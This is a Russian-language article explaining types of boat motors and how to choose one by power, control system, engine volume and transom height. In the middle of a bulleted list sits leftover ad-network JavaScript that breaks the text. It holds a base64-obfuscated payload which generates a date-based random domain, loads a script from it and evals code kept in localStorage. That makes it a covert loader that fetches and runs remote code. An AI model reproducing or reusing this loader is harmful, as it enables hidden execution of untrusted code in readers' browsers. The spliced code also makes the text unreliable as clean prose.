При выборе мотора большинство людей интересует одно: как быстро и без особых сложностей выбрать качественный лодочный мотор. В этой статье мы рассмотрим, какие существуют виды лодочных моторов и расскажем об их особенностях, чтобы вам легче было сориентироваться.
Типы лодочных моторов
По принципу работы выделяют 4 типа:
Двухтактный двигатель внутреннего сгорания (ДВС). Особенность этих двигателей в том, что рабочим считается каждый 2-й такт. За счет этого, при равном объеме камеры сгорания, они демонстрируют большую мощность.
4-тактный ДВС. Рабочий цикл состоит из 4 тактов. Считаются более надежным и экологически приемлемым вариантом, так как количество несгоревшего масла в выхлопе ниже, чем в случае с двухтактными. Также они меньше шумят, за счет чего подходят для малогабаритных лодок из ПВХ.
Электрический мотор. По мощности заметно уступают двум предыдущим типам, работающим на топливе, но зато почти бесшумны – идеальный выбор для ночной рыбалки.
Электрический мотор с аккумулятором. То же самое, что и предыдущий тип, но эти оснащены собственным аккумулятором и не требуют подключения к генератору.
Наиболее надежным и современным вариантом можно считать 4-тактный мотор для надувной лодки. Обслуживание обходится дешевле, чем в случае с 2-тактными, а также:
экономный расход топлива;
возможность длительное время работать на малых оборотах; (adsbygoogle = window.adsbygoogle || []).push({}); var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
показатели СО выхлопных газов минимальные.
Но если нужен двигатель большой мощности для лодки, чтобы иметь возможность развивать максимально высокую скорость – здесь 2-тактные модели вне конкуренции. Отдельные модели могут иметь мощность более 40 л.с. – недостижимый показатель для 4-тактных моторов.
Характеристики и что они значат
При выборе следует опираться на такие характеристики:
Система управления. Бывает румпельная и дистанционная. Первая имеет предельно простую конструкцию и считается очень надежной, так как по сути вы вручную контролируете поворот лопастей в воде. Дистанционная система сложнее и дороже, но она не требует от человека прямого контакта с двигателем. Румпельные системы подходят для маленьких лодок, дистанционные – для крупногабаритных.
Максимальная мощность. Здесь следует опираться на размер плавсредства, его вес и предположительную весовую нагрузку. Для небольшой ПВХ лодки достаточно мотора на 3-5 л.с. Лодке среднего размера рекомендуется от 10 до 20 л.с. и т.д.
Рабочий объем двигателя. Это касается только 2-тактных и 4-тактных ДВС – чем больше рабочий объем, тем выше мощность и расход топлива на километр.
Высота транца. Транец – задняя часть лодки, куда собственно устанавливают лодочный мотор. Измеряется от низа до верха. Двигатель подбираем соответствующий. В описаниях моделей высоту транца указывают одной из 4 латинских букв: S (380-450 мм), L (500-570 мм), X (600-640 мм), U (650-680 мм).
Надеемся, данная статья поможет подобрать подходящий мотор для лодки или катера. Удачи! (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/kakie-byvayut-lodochnye-motory-vidy-i-osobennosti/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook